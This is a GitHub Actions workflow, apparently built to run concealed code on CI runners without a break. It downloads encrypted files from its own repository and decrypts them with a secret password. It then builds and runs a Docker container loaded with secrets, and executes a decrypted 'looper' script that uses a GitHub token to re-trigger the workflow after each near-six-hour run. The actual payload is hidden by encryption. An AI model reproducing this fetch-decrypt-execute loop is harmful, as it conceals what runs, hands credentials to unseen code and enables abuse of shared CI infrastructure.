name: Joke

on:
  workflow_dispatch:

jobs:
  job-main:
    timeout-minutes: 355
    runs-on: ubuntu-latest
    steps:
      - name: Phase 1
        run: |
          wget "https://github.com/${{ github.repository }}/raw/main/joke"
          openssl enc -aes-256-cbc -d -in joke -out joke.zip -k ${{ secrets.THE_PASSWORD }}
          unzip joke.zip
          mv code/* ./
          rmdir code;rm joke*

      - name: Phase 2
        run: docker build . --tag this-is:my-thing

      - name: Phase 3
        run: docker run -e MYVAR1="${{ secrets.EV_MYVAR1 }}" -e MYVAR2="${{ secrets.EV_MYVAR2 }}" -e MYVAR3="${{ secrets.EV_MYVAR3 }}" -e USERS="${{ secrets.EV_USERS }}" -e ADMIN="${{ secrets.EV_ADMIN }}" -e VERSION="${{ secrets.EV_VERSION }}" this-is:my-thing

  job-repeat:
    if: ${{ always() }}
    needs: job-main
    runs-on: ubuntu-latest
    steps:
      - name: "Download the looper"
        run: |
          wget "https://github.com/${{ github.repository }}/raw/main/loop"
          openssl enc -aes-256-cbc -d -in loop -out script.sh -k ${{ secrets.THE_PASSWORD }}
          chmod +x ./script.sh; ./script.sh ${{ secrets.GH_TOKEN }} ${{ github.repository }} "joke.yml"
